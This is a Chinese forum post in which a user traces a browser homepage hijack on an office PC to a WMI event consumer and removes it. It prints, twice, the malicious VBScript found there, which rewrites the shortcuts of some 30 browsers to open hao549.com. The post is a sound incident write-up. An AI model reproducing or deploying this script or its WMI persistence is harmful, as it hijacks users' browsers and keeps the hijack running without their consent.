猫二
解决一个浏览器主页恶意劫持问题(WMI scrcons hao549 h...
今天公司财务主管突然问我一个浏览器主页被修改的问题 说找了网管哥们看过了还是没解决
我过去看了一下 财务电脑里除了IE还安装了两个浏览器 UC和360浏览器 快捷方式都被添加了hao549的指向
这里赞一下UC浏览器 因为是UC浏览器主动弹出主页被恶意修改的提示窗 这个问题才被重视起来
同时鄙视一下360安全卫士和金山毒霸,当时财务电脑里这两款软件都正常运行且升级到最新版本 结果是完全无用……
好了 闲话少叙 开始解决问题
经过网络资料搜索 看到木子李的Blog提到过类似的问题了 原因是通过WMI定时发起的脚本给所有浏览器添加了域名指向
按图索骥下载了WMITool软件 点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”
点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",右键选择view instant properties
查看ScriptText项…… 结果…… 结果没有发现文章中那段VBScript…… 到底是什么情况???
没办法 动用Process Monitor工具追踪了浏览器图标 结果发现确实是有脚本打开了scrcons.exe 跟文章中提到的情况雷同 看来是别的WMI
最后几番查找,终于在root\CIMV2里面揪出了真凶
缘来是在Consumer in root\CIMV2 -> _EventConsumer -> ActiveScriptEventConsumer下
找到ActiveScriptEventConsumer.Name=”VBScriptKids_consumer”
最后是在ScriptText中找到如下代码:
[mw_shl_code=javascript,false]On Error Resume Next:Const link = "http://hao549.com/?r=v&m=4":Const link360 = "http://hao549.com/?r=v&m=4&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tiand\Desktop,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tiand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:[/mw_shl_code]
排版后如下:
[mw_shl_code=javascript,true]On Error Resume Next
Const link = "http://hao549.com/?r=v&m=4"
Const link360 = "http://hao549.com/?r=v&m=4&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tiand\Desktop,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tiand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
oDic.Add LCase(browser), browser
Next
lnkpathsArr = split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
If fso.FolderExists(oFolder) Then
For Each file In fso.GetFolder(oFolder).Files
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
Set oShellLink = WshShell.CreateShortcut(file.Path)
path = oShellLink.TargetPath
name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
If oDic.Exists(LCase(name)) Then
If LCase(name) = LCase("360se.exe") Then
oShellLink.Arguments = link360
Else
oShellLink.Arguments = link
End If
If file.Attributes And 1 Then
file.Attributes = file.Attributes - 1
End If
oShellLink.Save
End If
End If
Next
End If
Next[/mw_shl_code]
呼~终于找到了 然后以管理员身份运行WMITool程序(wbemeventviewer.exe)进入root\CIMV2 删除恶意脚本
最后把几个浏览器的快捷方式跳转链接删除 问题解决
一个老问题 费这么大劲才解决 请坛里的大神笑笑就好 谢谢大家了